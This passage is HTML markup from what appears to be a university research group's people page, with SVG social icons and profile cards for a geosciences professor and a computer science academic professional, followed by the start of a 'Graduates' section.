29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c58-outer\">\n            <div data-colibri-id=\"182-c58\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c58 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c59\" class=\"d-block style-973 style-local-182-c59 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/Hassan-Babaie-300x300-1.jpg\" class=\"wp-image-1634 style-973-image style-local-182-c59-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c59-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c60\" class=\"h-global-transition-all h-heading style-974 style-local-182-c60 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c60\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Hassan Babaie</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c61\" class=\"h-text h-text-component style-975 style-local-182-c61 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Associate Professor\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c62\" class=\"h-text h-text-component style-976 style-local-182-c62 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c63\" class=\"style-977 style-local-182-c63 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://geosciences.gsu.edu/profile/hassan-babaie/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.researchgate.net/profile/Hassan-Babaie/4\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c64-outer\">\n            <div data-colibri-id=\"182-c64\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c64 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c65\" class=\"d-block style-973 style-local-182-c65 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-Faris-e1697216253732.jpg\" class=\"wp-image-1814 style-973-image style-local-182-c65-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c65-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c66\" class=\"h-global-transition-all h-heading style-974 style-local-182-c66 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c66\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Faris Hawamdeh</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c67\" class=\"h-text h-text-component style-975 style-local-182-c67 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Academic Professional\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c68\" class=\"h-text h-text-component style-976 style-local-182-c68 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c69\" class=\"style-977 style-local-182-c69 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/faris-hawamdeh/?trk=public_profile_publication_contributor-image\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/faris-hawamdeh/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.researchgate.net/profile/Faris-Hawamdeh\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c73\" id=\"grads\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-846 style-local-182-c73 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c146\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-860 style-local-182-c146 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-861-outer style-local-182-c147-outer\">\n            <div data-colibri-id=\"182-c147\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-861 style-local-182-c147 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c148\" class=\"h-global-transition-all h-heading style-862 style-local-182-c148 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-862 style-local-182-c148\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Graduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c74\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-847 style-local-182-c74 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c75-outer\">\n            <div data-colibri-id=\"182-c75\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c75 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c76\" class=\"d-block style-854 style-local-182-c76 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-cropped-282038166_2492815234187345_4129762528023780269_n-e1697205710763.jpg\" class=\"wp-image-1742 style-854-image style-local-182-c76-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md 